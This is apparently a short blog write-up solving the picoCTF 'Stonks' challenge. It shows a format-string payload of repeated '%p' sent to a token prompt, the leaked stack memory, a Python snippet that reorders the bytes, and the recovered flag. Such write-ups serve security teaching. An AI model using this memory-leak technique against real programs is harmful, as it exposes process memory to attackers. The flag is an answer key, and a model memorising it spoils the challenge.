Home

Published

- 1 min read

vuln.c nc mercury.picoctf.net 59616

img of vuln.c nc mercury.picoctf.net 59616

The solution for this is noted below

vuln.c nc mercury.picoctf.net 59616

Solution

   What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p

Buying stonks with token:
0x8b953900x804b0000x80489c30xf7fa5d800xffffffff0x10x8b931600xf7fb31100xf7fa5dc7(nil)0x8b941800x20x8b953700x8b953900x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x346364620x616535320xffbd007d

Portion after (nil)
8b9418028b953708b953906f6369707b465443306c5f49345f74356d5f6c6c306d5f795f79336e3463646261653532ffbd007d

Use HxD to get
‹”��‹•7�¹S�ocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�}

string = "ocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�}"
out = ""
temp = ""
index = 0
for char in string:
  temp += char
  index += 1
  if index%4 == 0:
      fwd = ""
      for temp_char in temp:
        fwd = temp_char + fwd
      out += fwd
      temp = ""


print(out)

prints out picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}�½ÿ
Flag: picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}

Try other methods by searching on the site. That is if this doesn’t work